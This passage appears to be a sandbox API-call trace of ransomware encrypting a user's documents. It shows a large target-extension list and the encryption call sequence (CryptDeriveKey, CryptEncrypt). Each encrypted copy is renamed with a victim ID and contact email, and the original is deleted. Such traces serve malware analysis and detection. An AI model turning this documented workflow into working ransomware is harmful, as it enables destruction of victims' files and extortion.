lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.783] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.783] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.783] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.789] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x16468, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x16468, lpOverlapped=0x0) returned 1
	[0186.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.794] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcaf78) returned 1
	[0186.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.797] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.798] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.798] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0186.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.798] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x16468, dwBufLen=0x16468 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x16470) returned 1
	[0186.802] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.802] RtlMoveMemory (in: Destination=0xff35f0, Source=0xfdd180, Length=0x16468 | out: Destination=0xff35f0) 
	[0186.802] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.802] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff35f0*, pdwDataLen=0x18bc0c*=0x16468, dwBufLen=0x16470 | out: pbData=0xff35f0*, pdwDataLen=0x18bc0c*=0x16470) returned 1
	[0186.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.805] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0186.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.805] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0186.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.806] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0186.806] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.806] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.831] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.832] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0186.832] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.833] WriteFile (in: hFile=0x2c0, lpBuffer=0xff35f0*, nNumberOfBytesToWrite=0x16470, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff35f0*, lpNumberOfBytesWritten=0x18c068*=0x16470, lpOverlapped=0x0) returned 1
	[0186.842] CloseHandle (hObject=0x2c0) returned 1
	[0186.842] CloseHandle (hObject=0x384) returned 1
	[0186.842] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx")) returned 1
	[0186.852] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx")) returned 0
	[0186.852] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff8df290, ftCreationTime.dwHighDateTime=0x1d8efed, ftLastAccessTime.dwLowDateTime=0xfd9fd2c0, ftLastAccessTime.dwHighDateTime=0x1d8f351, ftLastWriteTime.dwLowDateTime=0xfd9fd2c0, ftLastWriteTime.dwHighDateTime=0x1d8f351, nFileSizeHigh=0x0, nFileSizeLow=0xd90d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xjlGDZ7aAqLp90.docx", cAlternateFileName="XJLGDZ~1.DOC")) returned 1
	[0186.852] lstrcmpW (lpString1="xjlGDZ7aAqLp90.docx", lpString2="..") returned 1
	[0186.852] lstrcmpW (lpString1="xjlGDZ7aAqLp90.docx", lpString2=".") returned 1
	[0186.853] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.853] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="xjlGDZ7aAqLp90.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\xjlGDZ7aAqLp90.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\xjlGDZ7aAqLp90.docx"
	[0186.853] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\xjlGDZ7aAqLp90.docx") returned 51
	[0186.853] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.853] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\xjlGDZ7aAqLp90.docx", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx") returned 0x33
	[0186.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.854] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.855] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx"
	[0186.855] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx") returned 51
	[0186.856] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.856] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0186.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.857] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.c